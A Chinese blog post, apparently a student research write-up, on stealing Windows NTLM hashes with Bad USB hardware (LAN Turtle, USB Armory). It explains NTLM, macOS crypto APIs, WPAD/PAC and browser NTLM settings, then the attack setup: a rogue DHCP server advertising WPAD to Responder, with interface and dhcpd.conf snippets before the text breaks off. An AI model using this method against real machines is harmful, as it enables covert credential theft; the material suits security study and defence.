<!DOCTYPE html>












  


<html class="theme-next muse use-motion" lang="zh-CN">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">


























<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2">

<link rel="stylesheet" href="/css/main.css?v=7.0.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=7.0.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=7.0.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=7.0.0">


  <link rel="mask-icon" href="/images/logo.svg?v=7.0.0" color="#222">







<script id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '7.0.0',
    sidebar: {"position":"left","display":"always","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="一、项目概述项目最初的灵感来源于一篇翻译博客，在博客中技术人员演示了使用Bad USB恶意硬件设备窃取Windows哈希的技术，并称Mac同样能够获取，于是我们希望能够复现并加以改进。但是在实际学习调研的过程中，我们首先发现由于翻译不够负责，与英文原文相比翻译内容对实验结果有夸大，此外由于原本采购的硬件USB Armory驱动支持率过低的问题，我们在后来的研究中也改变了计划，采用了另一款驱动支持率">
<meta name="keywords" content="哈希">
<meta property="og:type" content="article">
<meta property="og:title" content="利用Bad USB窃取系统哈希的研究">
<meta property="og:url" content="http://yoursite.com/2017/02/12/利用Bad USB窃取系统哈希的研究/index.html">
<meta property="og:site_name" content="jiangbaige&#39;s blogs">
<meta property="og:description" content="一、项目概述项目最初的灵感来源于一篇翻译博客，在博客中技术人员演示了使用Bad USB恶意硬件设备窃取Windows哈希的技术，并称Mac同样能够获取，于是我们希望能够复现并加以改进。但是在实际学习调研的过程中，我们首先发现由于翻译不够负责，与英文原文相比翻译内容对实验结果有夸大，此外由于原本采购的硬件USB Armory驱动支持率过低的问题，我们在后来的研究中也改变了计划，采用了另一款驱动支持率">
<meta property="og:locale" content="zh-CN">
<meta property="og:updated_time" content="2019-02-13T08:18:30.602Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="利用Bad USB窃取系统哈希的研究">
<meta name="twitter:description" content="一、项目概述项目最初的灵感来源于一篇翻译博客，在博客中技术人员演示了使用Bad USB恶意硬件设备窃取Windows哈希的技术，并称Mac同样能够获取，于是我们希望能够复现并加以改进。但是在实际学习调研的过程中，我们首先发现由于翻译不够负责，与英文原文相比翻译内容对实验结果有夸大，此外由于原本采购的硬件USB Armory驱动支持率过低的问题，我们在后来的研究中也改变了计划，采用了另一款驱动支持率">






  <link rel="canonical" href="http://yoursite.com/2017/02/12/利用Bad USB窃取系统哈希的研究/">



<script id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>利用Bad USB窃取系统哈希的研究 | jiangbaige's blogs</title>
  












  <noscript>
  <style>
  .use-motion .motion-element,
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-title { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">jiangbaige's blogs</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
      
        <p class="site-subtitle">learning notes</p>
      
    
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
    
      
    

    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>首页</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-categories">

    
    
    
      
    

    

    <a href="/categories/" rel="section"><i class="menu-item-icon fa fa-fw fa-th"></i> <br>分类</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
    
      
    

    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>归档</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">

    
    
    
      
    

    

    <a href="/tags/" rel="section"><i class="menu-item-icon fa fa-fw fa-tags"></i> <br>标签</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-about">

    
    
    
      
    

    

    <a href="/about/" rel="section"><i class="menu-item-icon fa fa-fw fa-user"></i> <br>关于</a>

  </li>

      
      
    </ul>
  

  
    

  

  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2017/02/12/利用Bad USB窃取系统哈希的研究/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="baige jiang">
      <meta itemprop="description" content="Record learning notes at any time">
      <meta itemprop="image" content="/images/background.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="jiangbaige's blogs">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">利用Bad USB窃取系统哈希的研究

              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              

              
                
              

              <time title="创建时间：2017-02-12 22:04:55" itemprop="dateCreated datePublished" datetime="2017-02-12T22:04:55+08:00">2017-02-12</time>
            

            
              

              
                
                <span class="post-meta-divider">|</span>
                

                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                
                  <span class="post-meta-item-text">更新于</span>
                
                <time title="修改时间：2019-02-13 16:18:30" itemprop="dateModified" datetime="2019-02-13T16:18:30+08:00">2019-02-13</time>
              
            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope="" itemtype="http://schema.org/Thing"><a href="/categories/安全协议/" itemprop="url" rel="index"><span itemprop="name">安全协议</span></a></span>

                
                
              
            </span>
          

          
            
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>一、项目概述<br>项目最初的灵感来源于一篇翻译博客，在博客中技术人员演示了使用Bad USB恶意硬件设备窃取Windows哈希的技术，并称Mac同样能够获取，于是我们希望能够复现并加以改进。<br>但是在实际学习调研的过程中，我们首先发现由于翻译不够负责，与英文原文相比翻译内容对实验结果有夸大，此外由于原本采购的硬件USB Armory驱动支持率过低的问题，我们在后来的研究中也改变了计划，采用了另一款驱动支持率更高的硬件LAN Turtle，并成功获取了Windows NTLM哈希。<br>我们进行了大量的资料调研，也对这两款硬件在国内外的应用进行了深入研究，以下是详细情况。<br>二、Windows加密机制的研究<br>1.NTLM原理<br>在Windows 网络中，NTLM（NT LAN Manager）是一系列旨向用户提供认证，完整性和机密性的微软安全协议。NTLM有NTLMv1和NTLMv2两个版本，NTLMv2在安全上有了很大改进，基本上替代了NTLMv1。<br>虽然Kerberos已经代替NTLM成为活动目录中默认的认证协议，但是NTLM仍然被广泛的应用在客户端无法找到域控制器或者无法访问域控制器的情况下。比如，客户端不支持Kerberos，服务器没有加入域，或者用户是通过网络远程认证时，NTLM都非常有用。<br>1)NTLMv1原理<br>NTLM认证共需要三个消息完成，NTLM是Challenge-Response(质询-响应)验证机制的认证协议。这表示为了认证用户，服务器会发送Challenge给用户，(用户端)然后用户返回一个Response。这个Response是将Challenge，用户密码哈希和其他信息一起通过特定函数计算出来的结果。该函数保证了计算出正确的Response一定需要知道用户的密码（哈希）。(服务器端)服务器（或者该服务器信任的对象，如域控制器）从账户数据库中获得用户密码哈希，然后计算出Challenge对应的正确的Response。(验证)服务器会用该Response与用户返回的Response相比较，假如两值相同，则客户端通过服务器的验证。LM（LAN Manager）和NTLMv1认证协议存在漏洞。<br>2)NTLMv2原理<br>服务器发送给客户端的Challenge是一个8字节的随机数。在NTLMv2版本中，客户端发送给服务器的Response包含LMv2，定长客户端Challenge，NTv2和不定长客户端Challenge。<br>LMv2和NTv2是由服务器Challenge，客户端随机产生的Challenge以及由用户密码和其他身份信息产生的HMAC-MD5哈希值共同产生的HMAC-MD5哈希值。LMv2和NTv2的区别在于客户端随机产生的Challenge。LMv2中该Challenge是8字节的随机数，而NTv2中该Challenge是不定长的。为了让服务器能验证Response，所以需要在Response中加入LMv2和NTv2中使用的客户端Challenge，否则服务器无法产生一样的哈希值。<br>NTv2包含的不定长的客户端Challenge是由当前时间（以NT时间格式表示），8字节随机数，域名和一些标准格式的信息组成。所以，这个Challenge是不定长的。<br>LMv2和NTv2中由用户密码和其他身份信息产生的HMAC-MD5哈希值（v2-Hash）是由NT-Hash，用户名，域名等身份信息产生的HMAC-MD5哈希值。NT-Hash保存在SAM或者AD数据库中。<br>SC = 8字节服务器Challenge<br>CC = 8字节客户端Challenge<br>CC<em> = (X, time, CC, domain name)(X表示标准格式信息,time当前时间，domain name域名)<br>v2-Hash = HMAC-MD5(NT-Hash, user name, domain name)<br>LMv2 = HMAC-MD5(v2-Hash, SC, CC)<br>NTv2 = HMAC-MD5(v2-Hash, SC, CC</em>)<br>Response = LMv2 | CC | NTv2 | CC*<br>2.NTLM面向连接认证流程<br>不同于SMB或者HTTP这种独立的应用协议，NTLM消息是嵌在需要认证用户的应用协议中的。也就是说NTLM是嵌入协议。所以应用协议决定了如何和何时NTLM消息被编码，分帧和传输。<br>NTLM的实现也跟其他普通协议不一样。它由一组可以被其他应用协议调用的函数组成函数库，而不是网络协议栈中的某一层。微软将NTLM函数库实现为安全性支持提供程序（SSP），应用协议通过安全性支持提供程序接口（SSPI）调用它。<br>NTLM函数在处理调用者传递的参数后，返回认证消息。该认证消息放在调用者自己的消息字段中。如果仔细研究该消息，您会发现NTLM认证协议的两种主要变体：面向连接和无连接认证。<br>下图是应用协议创建一个认证会话时，NTLM面向连接认证的调用流程（call flow）：</p>
<p>流程如下：<br>1.Application message(s)：表示客户端和服务器之间发送的应用协议消息。<br>2.Application message [NTLM_NEGOTIATE]：客户端在发起认证时，首先向服务器发送Negotiate 协商消息。 协商需要认证的主体，用户，机器以及需要使用的安全服务等等信息。 并通知服务器自己支持的协议内容，加密等级等等Challenge 挑战消息。<br>3.Application message [NTLM_CHALLENGE]：服务器发送NTLM CHALLENGE_MESSAGE消息到客户端。该消息包括商定的安全特性和服务器产生的随机数（Challenge）。服务器在收到客户端的协商消息之后， 会读取其中的内容，并从中选择出自己所能接受的服务内容，加密等级，安全服务等等。 并生成一个随机数challenge, 然后生成challenge消息返回给客户端。<br>4.Application message [NTLM_AUTHENTICATE]：客户端向服务器发送NTLM AUTHENTICATE_MESSAGE消息。该消息包含用户名和Response。这个Response可以证实客户端知道用户的密码。服务器接下来会验证这个Response。假如该用户是本地账户，服务器可以根据本地账户数据库中的信息验证Response。假如该用户是域账户，服务器会将用户认证信息（用户名，服务器发送给客户端的Challenge，客户端发送给服务器的Response）发送给域控制器，由域控制器验证该Response。这时候NTLM协议认证过程完成。<br>5.Application message(s)：如果Challenge和Response证明客户端知道用户密码，那么认证成功。假如认证失败，服务器可能会以某种方式发送认证失败的状态给应用协议，或者单纯的结束连接。</p>
<p>三、Mac加密机制的研究<br>3.OS X底层加密机制<br>OS X系统有三种加密机制，分别是Mach、BSD、CSDA。其中CSDA已经在OS X v10.7版本以上被弃用，正在迁移到普通加密，不推荐被使用。<br>Mach和BSD均位于OS X最底层，用于存储密码和其他需要加密的信息，并且为其他更高层的加密方式提供支持，如Common Crypto。<br>4.Common Crypto<br>Apple开源加密技术，支持对称加密和非对称加密、散列与其他加密方式<br>5.OS X加密服务<br>重点包括：<br>加密与解密<br>使用keychains的密钥管理<br>基于密码学的强随机数生成<br>安全通信（SSL和TLS）<br>使用FileVault和iOS文件保护的安全存储<br>其中对称加密是使用单个共享密钥用于加密和解密数据；非对称加密则是使用一个密钥加密数据，使用单独但相关的密钥解密数据。使用散列检测数据修改，可以将哈希与非对称密钥相结合创建数字签名，对数字证书进行验证时，能够证明数据来源<br>6.API<br>OS X中提供的API有：<br>钥匙串服务API：用于为密码、密钥提供安全存储<br>加密消息语法：提供对称和非对称加密解密<br>证书、密钥和信任服务<br>钥匙串服务<br>Keychain Services API通常用于将密码，密钥，证书和其他秘密存储在称为钥匙串的特殊加密文件中，主要用于储存密码、密钥和其他短小的数据。OS X中的Keychain Access程序允许用户存储和读取Keychain中的数据。一个应用程序只能访问钥匙串中自己的项目<br>加密消息语法服务<br>允许添加数字签名到S/MIME消息，可用于加密电子邮件等<br>证书、密钥和信任服务<br>提供信任验证和支持，用于管理证书、公钥、私钥、对称密钥和信任策略，可以创建证书和非对称密钥、向钥匙串添加证书和密钥、将其从密钥链中删除并使用密钥对数据进行加密和解密、检索有关证书的信息（例如与其关联的私钥，所有者等）、将证书转换为便携式表示、创建和操作信任策略，并使用指定的一组信任策略评估特定的证书、添加锚证书<br>安全转换<br>在OS X v10.7及更高版本中用于执行对称加密和解密，非对称签名和验证以及Base64编码和解码，此外允许读取文件<br>四、WPAD网络代理自发现协议<br>WPAD即Web Proxy Auto-Discovery Protocol，能够借助DHCP/DNS服务器让浏览器自动发现代理服务，而代理服务对用户来说是透明的，于是能轻松访问互联网<br>1.WPAD概述<br>自动代理检测将由系统确定，Web代理服务器代表客户端发送请求。自动代理检测启动时，会尝试定位到代理发送请求后返回的代理配置文件位置。如果查找到代理配置文件，则会根据相关情况来配置代理服务<br>2.PAC文件<br>PAC即Proxy Auto-Config，是自动代理配置文件，定义了浏览器和其他用户代理如何自动选择适当的代理服务器来访问URL，在本项目中WPAD的应用是我们窃取NTLM Hash的核心。<br>一个PAC文件至少是一个定义了JavaScript函数的文件，核心函数FindProxyForURL(url, host)的具体情况如下：<br>function FindProxyForURL(url, host) {<br>   if (url== ‘<a href="http://www.baidu.com/&#39;" target="_blank" rel="noopener">http://www.baidu.com/&#39;</a>) return ‘DIRECT’;<br>   if (host== ‘twitter.com’) return ‘SOCKS 127.0.0.10:7070’;<br>   if (dnsResolve(host) == ‘10.0.0.100’) return ‘PROXY 127.0.0.1:8086;DIRECT’;<br>   return ‘DIRECT’;<br>由此我们也可以知道，能否顺利实现该功能也与浏览器的相关配置有关</p>
<p>3.Safari相关情况<br>经过调研大多数浏览器还是支持自动使用PAC与WPAD的，但Safari并不能自动启用。有一种手动为Safari启用WPAD的方法：</p>
<ul>
<li>Safari -&gt; Preferences</li>
<li>Advanced</li>
<li>Proxies -&gt; Change Settings</li>
<li>select Using A PAC File</li>
<li>enter “<a href="http://wpad/wpad.dat&quot;" target="_blank" rel="noopener">http://wpad/wpad.dat&quot;</a></li>
<li>Apply<br>在Mac不能自动启用WPAD的情况下，难以继续进行攻击<br>五、在Mac启用NTLM支持<br>1.配置支持NTLM的浏览器<br>PingFederate集成Windows身份验证（IWA）适配器支持Kerberos和NTLM身份验证协议，但某些浏览器需要配置才能使用它们。对于不同浏览器，需要采取不同的设置方式。<br>对于Kerberos和NTLM身份验证，PingFederate IWA适配器使用SPNEGO（简单和受保护的GSS-API协商）机制来协商Kerberos或NTLM作为底层验证协议。 以下每个浏览器都支持SPNEGO，但是由于浏览器和操作系统的组合，存在差异，这可能会有影响。<br>支持的浏览器：<br>IE浏览器<br>火狐浏览器<br>谷歌浏览器<br>苹果Safari<br>操作系统：<br>Windows 7/8<br>Mac OS X 10.8<br>iOS6.1（Safari和Chrome）<br>3)Internet Explorer<br>Internet Explorer支持IWA开箱即用，但由于网络或域环境有差异，可能需要其他配置。<br>在Active Directory（AD）环境中，IWA的默认身份验证协议为Kerberos，后退到NTLM。 如果将IWA适配器配置为AD环境中的Kerberos，则域加入的客户端将在IWA事务期间请求在Authenticate头响应中使用Kerberos故障单。 如果由于任何原因Kerberos无法协商，IWA适配器将回退到NTLM挑战/响应身份验证。 在这种情况下，用户将被提示输入他们的AD域凭据。<br>此外，Internet Explorer使用安全区域来区分哪些主机是Internet，本地Intranet，受信任的站点或受限站点。<br>IE中的安全区域（工具→Internet选项→安全）：</li>
</ul>
<p>默认情况下，不允许源自Internet主机的任何IWA认证请求。默认设置是仅允许客户端自动向Intranet区域内的主机提供凭据。站点被认为是在Intranet区域中：如果连接是使用UNC路径建立的（即\ pingsso）;该站点绕过代理服务器;或不包含句点的主机名（即http：// pingsso）。</p>
<p>大多数PingFederate SSO连接将使用SSO URL中的完全限定域名（FQDN），因此不会将其分类为内联网区域。因此，浏览器必须配置为通过将TrustedFileer主机名添加到“受信任的站点”区域来信任主机。在这里，默认设置是自动登录当前用户名和密码，这意味着如果可用，则使用Kerberos，然后使用NTLM。提示用户名和密码的设置将绕过Kerberos并直接进入NTLM身份验证。即使IWA适配器支持Kerberos，客户端也不会尝试在Authenticate头文件中发送Kerberos令牌。<br>在启用Internet Explorer增强安全配置的计算机（即服务器）上启用自动登录行为时，将通过登录提示覆盖。登录提示将允许Kerberos和NTLM登录功能，但不会使用用户登录中的缓存凭据。<br>要配置Internet Explorer以完全支持IWA适配器，请在Internet Explorer中选择“工具”→“Internet选项”→“安全”选项卡→单击“受信任的站点”→然后单击“自定义级别…”，一直滚动到“用户验证”下的“登录” ，选择使用当前用户名和密码自动登录。</p>
<p>配置完成后，单击“确定”，然后单击“受信任的站点”下的“站点”按钮，然后插入PingFederate服务器的主机名。可选地，可以包括通配符以信任AD域内的任何主机名（即* .adexample.pingidentity.com）。</p>
<p>上述设置适用于域名加入的计算机（即具有Active Directory帐户主体和信任关系的计算机）以及非域加入的计算机。对于域加入的计算机，需要登录一个AD用户帐户，并在SSO期间协商Kerberos认证协议。在非域名加入的计算机的情况下，Kerberos协议（WWW-Authenticate头中的协商）将不会协商，因此退回到NTLM。在这种情况下，将提示用户输入凭据，他们将输入ADEXAMPLE \ joe和要验证的密码。<br>注意：如果以下情况，NetBIOS域名（上述示例中的ADEXAMPLE）必须用于限定用户名：（1）计算机未加入AD域;或者（2）有多个AD域或林，并且用户正在通过跨域信任进行身份验证（即，用户位于DomainA中，但是PingFederate NTLM计算机帐户连接到DomainB）。 NTLM协议假设用户正在登录到存在PingFederate计算机帐户的域。这就是为什么用户名必须由域限定才能正常工作。<br>另请注意，可以将PingFederate URL添加到本地Intranet区域，作为将其添加到“受信任的站点”区域的替代方法。其原因可能会因环境的网络设计而有所不同，但设置受信任站点区域的自动登录意味着可以将请求中的协商/授权凭据发送到Intranet区域之外的站点。<br>4)Firefox<br>Mozilla Firefox支持SPNEGO身份验证协议，但必须配置为正确运行Kerberos身份验证。 Firefox不会使用Internet Explorer等安全区域的概念，但不会自动将Kerberos凭据提供给任何主机，除非明确配置。默认情况下，Firefox会拒绝来自任何Web服务器（包括IWA适配器）的所有SPNEGO挑战。 Firefox必须配置为允许与浏览器交换SPNEGO协议消息的站点的白名单。<br>这两个配置是：network.negotiate-auth.trusted-uris 和 network.automatic-ntlm-auth.trusted-uris<br>这些设置可以通过以下方式定义：<br>(1)进入about:config，并点击 I’ll be careful, I promise! 这个按钮</p>
<p>(2)在“搜索”对话框中，搜索上述偏好设置：</p>
<p>(3)在每个首选项中，指定任何主机或域名，并用逗号分隔。 请注意，通过在前面指定一个点（即.adexample.pingidentity.com）的域后缀，域可以通配。</p>
<p>就像在Internet Explorer中一样，向IWA适配器发出SSO请求的计算机也必须连接到Active Directory（AD），并使用域用户帐户登录。 Kerberos与NTLM协商也是一样 - 如果计算机不是域加入的，它将回到NTLM。<br>对于在Mac OS上运行的Firefox，如果计算机连接到AD，SPNEGO将协商Kerberos和NTLM。 在非域名加入的Mac OS上，只有NTLM将被选为SPNEGO的一种机制。<br>5)Chrome<br>Windows中的Google Chrome将使用Internet Explorer设置，因此可以在Internet Explorer的“工具”，“Internet选项”对话框中进行配置，也可以通过转到“控制面板”并在子类别“网络和Internet”中选择“Internet选项”。<br>对于Mac OS X下的Chrome，SPNEGO将无需任何额外的配置，但只能与NTLM协商。可以配置名为AuthServerWhitelist的设置来授权SPNEGO协议消息交换的主机或域名。有几种方法可以做到：（1）从命令行;或（2）将Mac OS加入AD。<br>1.在Mac OS终端中使用以下命令：<br>您将需要从Kerberos KDC（域控制器）获取初始票授予票（TGT），以便请求IWA适配器的服务票证：</p>
<blockquote>
<p>kinit <a href="mailto:joe@ADEXAMPLE.PINGIDENTITY.COM" target="_blank" rel="noopener">joe@ADEXAMPLE.PINGIDENTITY.COM</a><br><a href="mailto:joe@ADEXAMPLE.PINGIDENTITY.COM" target="_blank" rel="noopener">joe@ADEXAMPLE.PINGIDENTITY.COM</a>的密码：（密码在这里）<br>现在，进入Chrome目录，并使用AuthServerWhitelist参数启动Chrome：</p>
</blockquote>
<blockquote>
<p>cd / Applications / Google Chrome.app/Contents/MacOS<br>./“Google Chrome”–auth-server-whitelist =“ *。adexample.pingidentity.com”<br>配置完成后，每次Chrome启动时，此设置都将持续。您仍然需要每10个小时运行一次kinit，以便Chrome可以请求IWA适配器的服务单。<br>2.将Mac OS加入到Windows Active Directory中：<br>对于iOS（iPad和iPhone），仅通过SPNEGO的NTLM已经过测试。 Kerberos尚未经过测试或验证。<br>6)Safari<br>Windows上的Safari支持SPNEGO，无需进一步配置。 它支持Kerberos和NTLM作为SPNEGO的子机制。 相同的规则适用于Safari作为Firefox或Chrome，其中执行SSO的计算机必须由域用户进行域名加入和登录。 否则，它将回退到NTLM身份验证。<br>如果Mac OS加入AD，则Max OS上的Safari支持使用Kerberos的SPNEGO作为身份验证机制。 如果Mac OS未加入AD，则SPNEGO将始终协商NTLM作为认证机制。<br>六、LAN Turtle窃取哈希的原理分析<br>1.Lanturtle概述<br>Lanturtle是一款带有微处理器的网络适配器，它可以自动配置本地dhcp代理，插上之后默认lanturle是本机的默认网卡，但是它本身自己没有无线路由功能，可以通过预留的网络插口进行网上连接。这样以来，主机的所有网上流量都将通过lanturtle，可以用于截获上网流量以及接下来获取哈希的操作。<br>Lanturtle自带kali linux系统，其中内置一个简易的可视化图形界面，可以通过ssh安全连接进行控制，初始的ip地址为172.16.84.1。本机和网络适配器组成一个小的局域网，本机ip可通过ifconfig进行设置为静态ip（linux下），具体命令为：<br>Ifconfigethx（网卡名称）<br>netmask（子网掩码，此处可省略） 172.16.84.X<br>Lanturtle的CPU频率为400MHz，可基本运行kali必备软件，不能用来计算破解，运行内存为64MB，DDR2制式。即插即用，在黄色指示灯闪烁稳定后可以进行ssh连接和后续操作。<br>出现的问题：在lanturtle接入不同的主机（尤其是主机的操作系统不同）可能会导致本机地址ip自动配置错误，这是由于Lanturtle会记录上一次的主机信息导致不匹配需要手动设置ip地址才能进行连接。不过不影响Lanturtle的开机启动程序（例如设置Lanturtle开机即运行流量监控，程序依然会运行只是不能进行ssh连接）。<br>2.Responder程序概述<br>本程序是执行哈希窃取的关键。可以在github中下载次程序到Lanturtle中，新版本的Lanturtle内置了此程序。该程序可以监听主机经过网卡的任何操作，和访问到任何服务器地址。根据指令可以记录到本地并保存。这其中就可以记录用户在登陆网页需要认证的ntlm和ntlmv2哈希值。通过指令可以记录到sql表单中，Lanturtle自带python，但是没有自带sql，可以手动安装sqlites3.0，具体安装流程和linux普通操作系统一致，但是没有内置apt-get安装模块，可采用opkg下载deb包自动安装。<br>3.Lanturtle攻击原理<br>responder是用来获取经过网卡的流量动作的，需要配置可以让登陆认证操作经过Lanturtle。<br>我们想到了WPAD。WPAD（Web-Proxy Auto-Discovery Protocol）用来使浏览器自动寻找合适的代理服务器从而更加轻松的上网。WPAD检测DNS和DHCP的实时变化来配置上网策略。DHCP服务器是在局域网状态下给各个局域网主机分配ip地址的服务器，Lanturtle作为新的局域网关理所应当成为DCHP服务器。我们可以建立文件利用指令在Lanturtle中控制它。在插入Lanturtle后，本机的局域关系会发生变化。<br>设置Lanturtle清除原来的本机路由状态，配置Lanturtle的路由状态。此时本机的WPAD就会工作，向Lanturtle提供wpad.dat的本机配置文件以获得新的局域网ip地址。这时我们如果要求主机在请求ip的时候要求主机提供认证信息用来确认主机身份，这样主机的认证哈希就会发送给Lanturtle的DHCP服务器，理论上讲reponder就可以顺利工作了。<br>4.其他<br>使用usbarmory也能成功抓到哈希值，但是仅仅限制在windows7系统， windows7系统以上以及IOS系统均需要安装相关驱动才可以识别usb armory。<br>同时，试用Android网络共享功能——也就是所谓的Tethering来创建网络。启用网络共享功能之后，手机设备就能够接收来自主机的所有通信数据，手机是作为网关存在，也可以实现中间人攻击。用Android设备可以创建网络和DHCP服务器。使用Android的dnsmasq也可以很方便的创建DHCP服务器，并且配置WPAD选项指向Responder。在Android手机上使用Responder需要安装qPython，配置python编译环境。<br>七、窃取哈希具体实现过程<br>1.usb armory<br>1)usb armory安装kali系统<br>这是一个u盘大小的微处理器，购买后其中并没有任何系统，需要购买内存卡（8G以上），安装kali并烧录。安装文件在kali的官网上即可下载有专门为usb armory设计的kali系统。网址<br><a href="http://docs.kali.org/kali-on-arm/kali-linux-on-usb-armory" target="_blank" rel="noopener">http://docs.kali.org/kali-on-arm/kali-linux-on-usb-armory</a><br>当然烧录的方法有很多，使用win32 Disk Imager程序一键烧录。省去许多步骤，有需要加Q873481454包括树莓派等微处理器均可使用。<br>2)安装必备软件<br>下载安装python，sqlite3，python-openssl screen，responder。<br>前3个正常安装即可，不会的请重新学习linux系统，后一个在github中下载，如果下载压缩包解压后可直接使用<br>在运行responder.py有可能会缺少一些python包，pip安装即可。<br>推荐安装python2版本（基于C++），3有可能会报错。<br>3)配置文件<br>（1）设置接口（可选）<br>/etc/network/interfaces</p>
</blockquote>
<h1 id="interfaces-5-file-used-by-ifup-8-and-ifdown-8"><a href="#interfaces-5-file-used-by-ifup-8-and-ifdown-8" class="headerlink" title="interfaces(5) file used by ifup(8) and ifdown(8)"></a>interfaces(5) file used by ifup(8) and ifdown(8)</h1><h1 id="Include-files-from-etc-network-interfaces-d"><a href="#Include-files-from-etc-network-interfaces-d" class="headerlink" title="Include files from /etc/network/interfaces.d:"></a>Include files from /etc/network/interfaces.d:</h1><p>source-directory /etc/network/interfaces.d<br>auto usb0<br>allow-hotplug usb0<br>iface usb0 inet static<br>address 192.168.2.201<br>netmask 255.255.255.0<br>gateway 192.168.2.1<br>（2）建立DHCP服务器<br>/etc/dhcp/dhcpd.conf<br>ddns-update-style none;<br>option domain-name “domain.local”;<br>option domain-name-servers 192.168.2.201;<br>default-lease-time 60;<br>max-lease-time 72;</p>
<h1 id="If-this-DHCP-server-is-the-official-DHCP-server-for-the-local"><a href="#If-this-DHCP-server-is-the-official-DHCP-server-for-the-local" class="headerlink" title="If this DHCP server is the official DHCP server for the local"></a>If this DHCP server is the official DHCP server for the local</h1><h1 id="network-the-authoritative-directive-should-be-uncommented"><a href="#network-the-authoritative-directive-should-be-uncommented" class="headerlink" title="network, the authoritative directive should be uncommented."></a>network, the authoritative directive should be uncommented.</h1><p>authoritative;</p>
<h1 id="Use-this-to-send-dhcp-log-messages-to-a-different-log-file-you-also"><a href="#Use-this-to-send-dhcp-log-messages-to-a-different-log-file-you-also" class="headerlink" title="Use this to send dhcp log messages to a different log file (you also"></a>Use this to send dhcp log messages to a different log file (you also</h1><h1 id="have-to-hack-syslog-conf-to-complete-the-redirection"><a href="#have-to-hack-syslog-conf-to-complete-the-redirection" class="headerlink" title="have to hack syslog.conf to complete the redirection)."></a>have to hack syslog.conf to complete the redirection).</h1><p>log-facility local7;</p>
<h1 id="wpad"><a href="#wpad" class="headerlink" title="wpad"></a>wpad</h1><p>option local-proxy-config code 252 = text;</p>
